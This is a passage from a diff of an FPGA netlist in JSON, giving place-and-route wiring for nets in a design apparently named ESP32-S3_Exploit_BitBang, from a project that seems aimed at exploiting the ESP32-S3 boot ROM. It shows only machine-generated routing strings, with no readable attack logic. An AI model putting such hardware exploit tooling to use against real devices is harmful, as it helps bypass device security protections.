"X2Y10/B3;X2Y10/B3/Q3;1;X2Y10/X02;X2Y10/X02/Q3;1;X2Y10/D7;X2Y10/D7/X02;1;X2Y11/E230;X2Y11/E230/S231;1;X3Y11/S230;X3Y11/S230/E231;1;X3Y13/B1;X3Y13/B1/S232;1;X2Y12/B3;X2Y12/B3/S232;1;X2Y10/S230;X2Y10/S230/Q3;1;X2Y10/Q3;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:27.12-27.31" + } + }, + "instruction_counter_DFFE_Q_15_D": { + "hide_name": 0, + "bits": [ 7589 ] , + "attributes": { + "ROUTING": "X2Y10/F3;;1;X2Y10/XD3;X2Y10/XD3/F3;1" + } + }, + "instruction_counter_DFFE_Q_15_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7587 ] , + "attributes": { + "ROUTING": "X2Y10/COUT3;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter[9]": { + "hide_name": 0, + "bits": [ 7585 ] , + "attributes": { + "ROUTING": "X2Y10/X03;X2Y10/X03/Q4;1;X2Y10/B4;X2Y10/B4/X03;1;X2Y10/N130;X2Y10/N130/Q4;1;X2Y10/C7;X2Y10/C7/N130;1;X2Y10/W130;X2Y10/W130/Q4;1;X2Y10/S270;X2Y10/S270/W130;1;X2Y12/B4;X2Y12/B4/S272;1;X3Y13/B2;X3Y13/B2/S211;1;X2Y10/E100;X2Y10/E100/Q4;1;X3Y10/S200;X3Y10/S200/E101;1;X3Y12/S210;X3Y12/S210/S202;1;X2Y10/Q4;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:27.12-27.31" + } + }, + "instruction_counter_DFFE_Q_14_D": { + "hide_name": 0, + "bits": [ 7584 ] , + "attributes": { + "ROUTING": "X2Y10/F4;;1;X2Y10/XD4;X2Y10/XD4/F4;1" + } + }, + "instruction_counter_DFFE_Q_14_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7582 ] , + "attributes": { + "ROUTING": "X2Y10/COUT4;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter[10]": { + "hide_name": 0, + "bits": [ 7580 ] , + "attributes": { + "ROUTING": "X2Y10/B5;X2Y10/B5/X08;1;X2Y10/X08;X2Y10/X08/Q5;1;X2Y10/B7;X2Y10/B7/X08;1;X2Y10/N100;X2Y10/N100/Q5;1;X2Y9/S800;X2Y9/S800/N101;1;X2Y13/E230;X2Y13/E230/S804;1;X3Y13/B3;X3Y13/B3/E231;1;X2Y10/Q5;;1;X2Y10/S250;X2Y10/S250/Q5;1;X2Y12/B5;X2Y12/B5/S252;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:27.12-27.31" + } + }, + "instruction_counter_DFFE_Q_13_D": { + "hide_name": 0, + "bits": [ 7579 ] , + "attributes": { + "ROUTING": "X2Y10/F5;;1;X2Y10/XD5;X2Y10/XD5/F5;1" + } + }, + "instruction_counter_DFFE_Q_13_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7577 ] , + "attributes": { + "ROUTING": "X3Y10/CIN0;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter[11]": { + "hide_name": 0, + "bits": [ 7575 ] , + "attributes": { + "ROUTING": "X3Y10/X05;X3Y10/X05/Q0;1;X3Y10/B0;X3Y10/B0/X05;1;X3Y12/X04;X3Y12/X04/S271;1;X3Y12/B0;X3Y12/B0/X04;1;X3Y11/S270;X3Y11/S270/S131;1;X3Y13/B4;X3Y13/B4/S272;1;X3Y10/Q0;;1;X3Y10/W130;X3Y10/W130/Q0;1;X3Y10/S130;X3Y10/S130/Q0;1;X2Y10/A7;X2Y10/A7/W131;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:27.12-27.31" + } + }, + "instruction_counter_DFFE_Q_12_D": { + "hide_name": 0, + "bits": [ 7574 ] , + "attributes": { + "ROUTING": "X3Y10/F0;;1;X3Y10/XD0;X3Y10/XD0/F0;1" + } + }, + "instruction_counter_DFFE_Q_12_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7572 ] , + "attributes": { + "ROUTING": "X3Y10/COUT0;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter[12]": { + "hide_name": 0, + "bits": [ 7570 ] , + "attributes": { + "ROUTING": "X3Y10/N130;X3Y10/N130/Q1;1;X3Y10/E240;X3Y10/E240/N130;1;X3Y10/B6;X3Y10/B6/E240;1;X3Y10/B1;X3Y10/B1/Q1;1;X3Y10/S210;X3Y10/S210/Q1;1;X3Y12/B1;X3Y12/B1/S212;1;X3Y13/B5;X3Y13/B5/S252;1;X3Y11/S250;X3Y11/S250/S111;1;X3Y10/SN10;X3Y10/SN10/Q1;1;X3Y10/Q1;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:27.12-27.31" + } + }, + "instruction_counter_DFFE_Q_11_D": { + "hide_name": 0, + "bits": [ 7569 ] , + "attributes": { + "ROUTING": "X3Y10/F1;;1;X3Y10/XD1;X3Y10/XD1/F1;1" + } + }, + "instruction_counter_DFFE_Q_10_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7567 ] , + "attributes": { + "ROUTING": "X3Y10/COUT2;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter_DFFE_Q_11_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7566 ] , + "attributes": { + "ROUTING": "X3Y10/COUT1;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter[13]": { + "hide_name": 0, + "bits": [ 7564 ] , + "attributes": { + "ROUTING": "X3Y10/A6;X3Y10/A6/X01;1;X3Y10/X01;X3Y10/X01/Q2;1;X3Y10/B2;X3Y10/B2/X01;1;X3Y10/EW10;X3Y10/EW10/Q2;1;X4Y10/S210;X4Y10/S210/E111;1;X4Y12/S210;X4Y12/S210/S212;1;X4Y13/B0;X4Y13/B0/S211;1;X3Y10/Q2;;1;X3Y10/SN20;X3Y10/SN20/Q2;1;X3Y11/S260;X3Y11/S260/S121;1;X3Y12/X03;X3Y12/X03/S261;1;X3Y12/B2;X3Y12/B2/X03;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:27.12-27.31" + } + }, + "instruction_counter_DFFE_Q_10_D": { + "hide_name": 0, + "bits": [ 7563 ] , + "attributes": { + "ROUTING": "X3Y10/F2;;1;X3Y10/XD2;X3Y10/XD2/F2;1" + } + }, + "instruction_counter[22]": { + "hide_name": 0, + "bits": [ 7561 ] , + "attributes": { + "ROUTING": "X4Y10/EW10;X4Y10/EW10/Q5;1;X5Y10/S250;X5Y10/S250/E111;1;X5Y11/B7;X5Y11/B7/S251;1;X4Y10/X08;X4Y10/X08/Q5;1;X4Y10/B5;X4Y10/B5/X08;1;X4Y10/S250;X4Y10/S250/Q5;1;X4Y12/B5;X4Y12/B5/S252;1;X4Y10/Q5;;1;X4Y10/E100;X4Y10/E100/Q5;1;X5Y10/S200;X5Y10/S200/E101;1;X5Y12/S210;X5Y12/S210/S202;1;X5Y13/B3;X5Y13/B3/S211;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:27.12-27.31" + } + }, + "instruction_counter_DFFE_Q_1_D": { + "hide_name": 0, + "bits": [ 7560 ] , + "attributes": { + "ROUTING": "X4Y10/F5;;1;X4Y10/XD5;X4Y10/XD5/F5;1" + } + }, + "instruction_counter[23]": { + "hide_name": 0, + "bits": [ 7558 ] , + "attributes": { + "ROUTING": "X5Y11/A7;X5Y11/A7/S101;1;X5Y10/S210;X5Y10/S210/S100;1;X5Y12/B0;X5Y12/B0/S212;1;X5Y10/S100;X5Y10/S100/Q2;1;X5Y10/B0;X5Y10/B0/S100;1;X5Y10/Q2;;1;X5Y10/SN10;X5Y10/SN10/Q2;1;X5Y11/S250;X5Y11/S250/S111;1;X5Y13/B4;X5Y13/B4/S252;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:27.12-27.31" + } + }, + "instruction_counter_DFFE_Q_D": { + "hide_name": 0, + "bits": [ 7557 ] , + "attributes": { + "ROUTING": "X5Y10/F0;;1;X5Y10/D2;X5Y10/D2/F0;1;X5Y10/XD2;X5Y10/XD2/D2;1" + } + }, + "running_LUT4_I1_F[1]": { + "hide_name": 0, + "bits": [ 7556 ] , + "attributes": { + "ROUTING": "X2Y14/B6;X2Y14/B6/W111;1;X2Y14/B7;X2Y14/B7/W111;1;X3Y14/W250;X3Y14/W250/F5;1;X1Y14/X08;X1Y14/X08/W252;1;X1Y14/B6;X1Y14/B6/X08;1;X4Y11/CE2;X4Y11/CE2/N211;1;X3Y10/CE1;X3Y10/CE1/X07;1;X3Y10/CE2;X3Y10/CE2/X07;1;X3Y12/N200;X3Y12/N200/N252;1;X3Y10/X07;X3Y10/X07/N202;1;X3Y10/CE0;X3Y10/CE0/X07;1;X4Y11/CE1;X4Y11/CE1/N211;1;X4Y10/CE2;X4Y10/CE2/N212;1;X2Y10/CE2;X2Y10/CE2/N212;1;X4Y14/N210;X4Y14/N210/E111;1;X4Y12/N210;X4Y12/N210/N212;1;X4Y10/CE1;X4Y10/CE1/N212;1;X2Y10/CE0;X2Y10/CE0/N212;1;X2Y14/N210;X2Y14/N210/W111;1;X2Y12/N210;X2Y12/N210/N212;1;X2Y10/CE1;X2Y10/CE1/N212;1;X3Y10/E250;X3Y10/E250/N834;1;X5Y10/X08;X5Y10/X08/E252;1;X5Y10/CE1;X5Y10/CE1/X08;1;X1Y10/CE2;X1Y10/CE2/X07;1;X1Y10/X07;X1Y10/X07/W262;1;X1Y10/CE1;X1Y10/CE1/X07;1;X3Y14/N250;X3Y14/N250/F5;1;X3Y12/E250;X3Y12/E250/N252;1;X5Y12/A7;X5Y12/A7/E252;1;X3Y14/SN20;X3Y14/SN20/F5;1;X3Y13/N220;X3Y13/N220/N121;1;X3Y11/C7;X3Y11/C7/N222;1;X3Y14/EW10;X3Y14/EW10/F5;1;X2Y14/N810;X2Y14/N810/W111;1;X2Y6/S210;X2Y6/S210/N818;1;X2Y8/CE2;X2Y8/CE2/S212;1;X3Y14/F5;;1;X3Y14/N830;X3Y14/N830/F5;1;X3Y10/W260;X3Y10/W260/N834;1;X1Y10/N260;X1Y10/N260/W262;1;X1Y8/X05;X1Y8/X05/N262;1;X1Y8/CE2;X1Y8/CE2/X05;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21", + "force_downto": "00000000000000000000000000000001" + } + }, + "exploit_tx_count_DFFE_Q_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7554 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 ", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "exploit_tx_count_DFFE_Q_5_D": { + "hide_name": 0, + "bits": [ 7551 ] , + "attributes": { + "ROUTING": "X5Y12/F2;;1;X5Y12/XD2;X5Y12/XD2/F2;1" + } + }, + "exploit_tx_count_DFFE_Q_4_D_ALU_SUM_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7549 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "exploit_tx_count_DFFE_Q_4_D_ALU_SUM_CIN": { + "hide_name": 0, + "bits": [ 7547 ] , + "attributes": { + "ROUTING": "X6Y11/COUT1;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "exploit_tx_count_DFFE_Q_4_D": { + "hide_name": 0, + "bits": [ 7545 ] , + "attributes": { + "ROUTING": "X6Y11/F2;;1;X6Y11/S130;X6Y11/S130/F2;1;X6Y12/W270;X6Y12/W270/S131;1;X5Y12/A4;X5Y12/A4/W271;1;X5Y12/XD4;X5Y12/XD4/A4;1" + } + }, + "exploit_tx_count_DFFE_Q_4_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7543 ] , + "attributes": { + "ROUTING": "X6Y11/COUT2;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "exploit_tx_count_DFFE_Q_3_D": { + "hide_name": 0, + "bits": [ 7541 ] , + "attributes": { + "ROUTING": "X6Y11/F3;;1;X6Y11/EW20;X6Y11/EW20/F3;1;X5Y11/S220;X5Y11/S220/W121;1;X5Y12/D3;X5Y12/D3/S221;1;X5Y12/XD3;X5Y12/XD3/D3;1" + } + }, + "exploit_tx_count_DFFE_Q_3_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7539 ] , + "attributes": { + "ROUTING": "X6Y11/COUT3;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "exploit_tx_count_DFFE_Q_2_D": { + "hide_name": 0, + "bits": [ 7537 ] , + "attributes": { + "ROUTING": "X6Y11/F4;;1;X6Y11/S100;X6Y11/S100/F4;1;X6Y12/A4;X6Y12/A4/S101;1;X6Y12/XD4;X6Y12/XD4/A4;1" + } + }, + "exploit_tx_count_DFFE_Q_1_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7535 ] , + "attributes": { + "ROUTING": "X7Y11/CIN0;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "exploit_tx_count_DFFE_Q_2_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7534 ] , + "attributes": { + "ROUTING": "X6Y11/COUT4;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "exploit_tx_count_DFFE_Q_1_D": { + "hide_name": 0, + "bits": [ 7532 ] , + "attributes": { + "ROUTING": "X6Y11/F5;;1;X6Y11/SN20;X6Y11/SN20/F5;1;X6Y12/B5;X6Y12/B5/S121;1;X6Y12/XD5;X6Y12/XD5/B5;1" + } + }, + "exploit_tx_count_DFFE_Q_D": { + "hide_name": 0, + "bits": [ 7530 ] , + "attributes": { + "ROUTING": "X7Y11/F0;;1;X7Y11/W200;X7Y11/W200/F0;1;X5Y11/D1;X5Y11/D1/W202;1;X5Y11/XD1;X5Y11/XD1/D1;1" + } + }, + "$PACKER_GND": { + "hide_name": 1, + "bits": [ 8057 ] , + "attributes": { + "ROUTING": "X4Y12/A0;X4Y12/A0/E210;1;X4Y13/A3;X4Y13/A3/W271;1;X3Y12/A3;X3Y12/A3/N210;1;X2Y12/D3;X2Y12/D3/S270;1;X3Y10/A0;X3Y10/A0/E210;1;X2Y12/D5;X2Y12/D5/W270;1;X2Y13/D5;X2Y13/D5/W270;1;X4Y12/E220;X4Y12/E220/E272;1;X5Y12/D0;X5Y12/D0/E221;1;X3Y10/A2;X3Y10/A2/N210;1;X2Y13/D3;X2Y13/D3/S270;1;X5Y12/E210;X5Y12/E210/VSS;1;X5Y12/A0;X5Y12/A0/E210;1;X3Y13/A5;X3Y13/A5/W271;1;X1Y10/A4;X1Y10/A4/W210;1;X4Y13/D2;X4Y13/D2/S270;1;X3Y12/D0;X3Y12/D0/E270;1;X2Y10/A4;X2Y10/A4/W210;1;X2Y12/A3;X2Y12/A3/N251;1;X3Y14/LSR1;X3Y14/LSR1/S271;1;X1Y12/D2;X1Y12/D2/S270;1;X2Y12/W270;X2Y12/W270/VSS;1;X2Y12/D4;X2Y12/D4/W270;1;X4Y13/A5;X4Y13/A5/W210;1;X2Y13/A2;X2Y13/A2/N210;1;X6Y11/A5;X6Y11/A5/W210;1;X3Y13/D2;X3Y13/D2/S270;1;X3Y13/A4;X3Y13/A4/E271;1;X5Y13/D2;X5Y13/D2/S270;1;X1Y12/E210;X1Y12/E210/VSS;1;X1Y12/A1;X1Y12/A1/E210;1;X3Y12/A1;X3Y12/A1/E210;1;X3Y12/D1;X3Y12/D1/E270;1;X3Y13/D5;X3Y13/D5/W270;1;X1Y10/A2;X1Y10/A2/N210;1;X3Y12/D3;X3Y12/D3/X06;1;X5Y10/A0;X5Y10/A0/E210;1;X4Y13/A2;X4Y13/A2/E271;1;X3Y12/X06;X3Y12/X06/W211;1;X3Y12/D2;X3Y12/D2/X06;1;X3Y14/E210;X3Y14/E210/VSS;1;X3Y14/A0;X3Y14/A0/E210;1;X2Y13/W270;X2Y13/W270/VSS;1;X2Y13/D4;X2Y13/D4/W270;1;X4Y13/A0;X4Y13/A0/E210;1;X3Y14/LSR2;X3Y14/LSR2/S271;1;X5Y13/W270;X5Y13/W270/VSS;1;X5Y13/D4;X5Y13/D4/W270;1;X5Y13/A2;X5Y13/A2/N210;1;X2Y10/A3;X2Y10/A3/N210;1;X3Y13/S270;X3Y13/S270/VSS;1;X3Y13/D3;X3Y13/D3/S270;1;X3Y12/A4;X3Y12/A4/W210;1;X1Y12/D5;X1Y12/D5/W270;1;X2Y10/A1;X2Y10/A1/E210;1;X4Y12/D5;X4Y12/D5/W270;1;X5Y13/W210;X5Y13/W210/VSS;1;X5Y13/A4;X5Y13/A4/W210;1;X1Y12/E270;X1Y12/E270/VSS;1;X1Y12/D1;X1Y12/D1/E270;1;X4Y12/D2;X4Y12/D2/S270;1;X2Y12/D0;X2Y12/D0/E270;1;X5Y13/A0;X5Y13/A0/E210;1;X3Y13/E210;X3Y13/E210/VSS;1;X3Y13/A1;X3Y13/A1/E210;1;X5Y13/D0;X5Y13/D0/E270;1;X3Y13/D1;X3Y13/D1/E270;1;X2Y12/S270;X2Y12/S270/VSS;1;X2Y12/D2;X2Y12/D2/S270;1;X4Y13/E210;X4Y13/E210/VSS;1;X4Y13/A1;X4Y13/A1/E210;1;X4Y12/A4;X4Y12/A4/W210;1;X1Y12/A5;X1Y12/A5/W210;1;X1Y10/N210;X1Y10/N210/VSS;1;X1Y10/A3;X1Y10/A3/N210;1;X3Y12/D5;X3Y12/D5/W270;1;X4Y10/A1;X4Y10/A1/E210;1;X2Y14/A5;X2Y14/A5/W210;1;X3Y12/W210;X3Y12/W210/VSS;1;X3Y12/A5;X3Y12/A5/W210;1;X1Y12/W210;X1Y12/W210/VSS;1;X1Y12/A4;X1Y12/A4/W210;1;X3Y13/W270;X3Y13/W270/VSS;1;X3Y13/D4;X3Y13/D4/W270;1;X2Y13/W210;X2Y13/W210/VSS;1;X2Y13/A5;X2Y13/A5/W210;1;X4Y13/W210;X4Y13/W210/VSS;1;X4Y13/A4;X4Y13/A4/W210;1;X4Y13/S270;X4Y13/S270/VSS;1;X4Y13/D3;X4Y13/D3/S270;1;X2Y13/S270;X2Y13/S270/VSS;1;X2Y13/D2;X2Y13/D2/S270;1;X3Y10/A4;X3Y10/A4/W210;1;X1Y12/N210;X1Y12/N210/VSS;1;X1Y12/A2;X1Y12/A2/N210;1;X4Y12/S270;X4Y12/S270/VSS;1;X4Y12/D3;X4Y12/D3/S270;1;X4Y13/D5;X4Y13/D5/W270;1;X4Y13/D1;X4Y13/D1/E270;1;X4Y10/E210;X4Y10/E210/VSS;1;X4Y10/A0;X4Y10/A0/E210;1;X2Y12/E270;X2Y12/E270/VSS;1;X2Y12/D1;X2Y12/D1/E270;1;X5Y13/E270;X5Y13/E270/VSS;1;X5Y13/D1;X5Y13/D1/E270;1;X4Y12/A3;X4Y12/A3/E271;1;X7Y11/E210;X7Y11/E210/VSS;1;X7Y11/A0;X7Y11/A0/E210;1;X4Y12/W270;X4Y12/W270/VSS;1;X4Y12/D4;X4Y12/D4/W270;1;X3Y13/A3;X3Y13/A3/E271;1;X2Y13/E270;X2Y13/E270/VSS;1;X2Y13/D1;X2Y13/D1/E270;1;X3Y13/A2;X3Y13/A2/W271;1;X1Y12/S270;X1Y12/S270/VSS;1;X1Y12/D3;X1Y12/D3/S270;1;X4Y10/A5;X4Y10/A5/W210;1;X3Y12/W270;X3Y12/W270/VSS;1;X3Y12/D4;X3Y12/D4/W270;1;X1Y8/E210;X1Y8/E210/VSS;1;X2Y8/LSR2;X2Y8/LSR2/E211;1;X3Y12/E210;X3Y12/E210/VSS;1;X3Y12/A0;X3Y12/A0/E210;1;X5Y10/E210;X5Y10/E210/VSS;1;X2Y14/A2;X2Y14/A2/E271;1;X5Y13/E210;X5Y13/E210/VSS;1;X5Y13/A1;X5Y13/A1/E210;1;X3Y12/N210;X3Y12/N210/VSS;1;X3Y12/A2;X3Y12/A2/N210;1;X1Y14/E270;X1Y14/E270/VSS;1;X2Y14/A3;X2Y14/A3/E271;1;X2Y10/W210;X2Y10/W210/VSS;1;X2Y10/A5;X2Y10/A5/W210;1;X2Y12/A5;X2Y12/A5/W210;1;X4Y10/A2;X4Y10/A2/N210;1;X4Y13/W270;X4Y13/W270/VSS;1;X4Y13/D4;X4Y13/D4/W270;1;X1Y12/W270;X1Y12/W270/VSS;1;X1Y12/D4;X1Y12/D4/W270;1;X5Y13/N210;X5Y13/N210/VSS;1;X5Y13/A3;X5Y13/A3/N210;1;X2Y10/E210;X2Y10/E210/VSS;1;X2Y10/A0;X2Y10/A0/E210;1;X2Y12/W210;X2Y12/W210/VSS;1;X2Y12/A4;X2Y12/A4/W210;1;X5Y13/S270;X5Y13/S270/VSS;1;X5Y13/D3;X5Y13/D3/S270;1;X3Y10/E210;X3Y10/E210/VSS;1;X3Y10/A1;X3Y10/A1/E210;1;X2Y10/N210;X2Y10/N210/VSS;1;X2Y10/A2;X2Y10/A2/N210;1;X4Y10/W210;X4Y10/W210/VSS;1;X4Y10/A4;X4Y10/A4/W210;1;X3Y13/E270;X3Y13/E270/VSS;1;X3Y13/D0;X3Y13/D0/E270;1;X4Y10/N210;X4Y10/N210/VSS;1;X4Y10/A3;X4Y10/A3/N210;1;X3Y10/W210;X3Y10/W210/VSS;1;X3Y10/A5;X3Y10/A5/W210;1;X2Y13/E210;X2Y13/E210/VSS;1;X2Y13/A1;X2Y13/A1/E210;1;X3Y10/N210;X3Y10/N210/VSS;1;X3Y10/A3;X3Y10/A3/N210;1;X1Y10/W210;X1Y10/W210/VSS;1;X1Y10/A5;X1Y10/A5/W210;1;X2Y14/W210;X2Y14/W210/VSS;1;X2Y14/A4;X2Y14/A4/W210;1;X6Y11/W210;X6Y11/W210/VSS;1;X6Y11/A4;X6Y11/A4/W210;1;X2Y13/N210;X2Y13/N210/VSS;1;X2Y13/A3;X2Y13/A3/N210;1;X6Y11/A2;X6Y11/A2/N210;1;X4Y13/E270;X4Y13/E270/VSS;1;X4Y13/D0;X4Y13/D0/E270;1;X4Y12/W210;X4Y12/W210/VSS;1;X4Y12/A5;X4Y12/A5/W210;1;X2Y13/N250;X2Y13/N250/VSS;1;X2Y12/A2;X2Y12/A2/N251;1;X4Y12/D1;X4Y12/D1/E270;1;X4Y12/E270;X4Y12/E270/VSS;1;X4Y12/D0;X4Y12/D0/E270;1;X3Y12/E270;X3Y12/E270/VSS;1;X4Y12/A2;X4Y12/A2/E271;1;X4Y12/E210;X4Y12/E210/VSS;1;X4Y12/A1;X4Y12/A1/E210;1;X0Y0/VSS;;1;X6Y11/N210;X6Y11/N210/VSS;1;X6Y11/A3;X6Y11/A3/N210;1" + } + }, + "clk_in": { + "hide_name": 0, + "bits": [ 7408 ] , + "attributes": { + "ROUTING": " ", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:4.11-4.17" + } + }, + "$PACKER_VCC": { + "hide_name": 1, + "bits": [ 8056 ] , + "attributes": { + "ROUTING": 